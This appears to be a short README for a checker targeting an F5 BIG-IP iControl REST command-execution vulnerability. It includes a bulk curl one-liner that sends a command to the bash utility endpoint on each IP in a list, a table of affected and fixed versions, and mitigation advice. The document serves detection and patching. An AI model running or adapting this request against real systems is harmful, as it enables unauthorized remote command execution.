This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services
You can use the following curl one liner to check for the F5 Big-IP vulnerability or use the provided python script.
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done| Branch | Vulnerable Versions | Fixes Introduced |
|---|---|---|
| 11.x | 11.6.1-11.6.5 | No Fix |
| 12.x | 12.1.0-12.1.6 | No Fix |
| 13.x | 13.1.0-13.1.4 | 13.1.5 |
| 14.x | 14.1.0-14.1.4 | 14.1.4.6 |
| 15.x | 15.1.0-15.1.5 | 15.1.5.1 |
| 16.x | 16.1.0-16.1.2 | 16.1.2.2 |
| 17.x | None | 17.0.0 |
- Upgrade to the fixed version in ```Fixes Introduced``` Column. (Preferred Method)
- Block iControl REST access through the self IP address
- Block iControl REST access through the management interface
- Modify the BIG-IP httpd configuration
For more information about mitigation check out the references.